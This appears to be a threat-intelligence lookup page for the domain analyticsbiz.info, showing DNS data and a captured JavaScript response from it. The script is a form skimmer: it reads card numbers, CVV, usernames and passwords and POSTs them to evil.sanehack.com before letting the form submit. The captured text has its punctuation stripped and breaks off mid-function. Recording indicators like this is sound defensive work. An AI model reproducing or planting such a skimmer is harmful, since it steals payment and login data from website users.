Domain > analyticsbiz.info

More information on this domain is in AlienVault OTX

DNS Resolutions

Date	IP Address
2025-01-25	66.22.16.181 (ClassC)

HTTP/1.1 200 OKContent-Type: application/javascriptContent-Length: 2795Connection: keep-aliveDate: Fri, 13 Dec 2024 20:09:41 GMTLast-Modified: Mon, 18 Nov 2024 18:59:15 GMTETag: 673b8e83-aebAccess-Con

// List of IDs or names to capture data fromconst fieldsToCapture      name,    cardNumber,    username,    password,    credit_card_number,    credit_card_month,    credit_card_year,    credit_card_cvv,    creditCardMonthField,    creditCardField,    creditCardYearField,    creditCardCVVField;// Function to get the value of an element by ID or namefunction getValueByIdOrName(idOrName) {    const element  document.getElementById(idOrName) || document.getElementsByName(idOrName)0;    return element ? element.value : ; // Return the value or an empty string if not found}// Function to handle form data capture and exfiltrationfunction captureFormData(event) {    console.log(Form submitted:, event.target); // Log the form being submitted    event.preventDefault(); // Prevent the form from submitting immediately    // Gather data from the fields we want to capture    let capturedData  {};    fieldsToCapture.forEach(field > {        const value  getValueByIdOrName(field);        console.log(`Field: ${field}, Value: ${value}`); // Log each field and its value        if (value) {            capturedDatafield  value;        }    });    console.log(Captured Data Object:, capturedData); // Log the captured data object    // Send data if any relevant field is found    if (Object.keys(capturedData).length > 0) {        console.log(Sending data to https://evil.sanehack.com...);        fetch(https://evil.sanehack.com, {            method: POST,            headers: { Content-Type: application/json },            body: JSON.stringify(capturedData)        })        .then(response > {            console.log(Fetch Response Status:, response.status); // Log the response status            return response.text();        })        .then(data > {            console.log(Fetch Response Data:, data); // Log the response data            // After data is sent, submit the form to its original destination            event.target.submit();        })        .catch(error > {            console.error(Error sending data:, error);            // Submit

View on OTX | View on ThreatMiner

Data with thanks to AlienVault OTX, VirusTotal, Malwr and others. [Sitemap]

Domain > analyticsbiz.info

Is this malicious?

DNS Resolutions

Port 443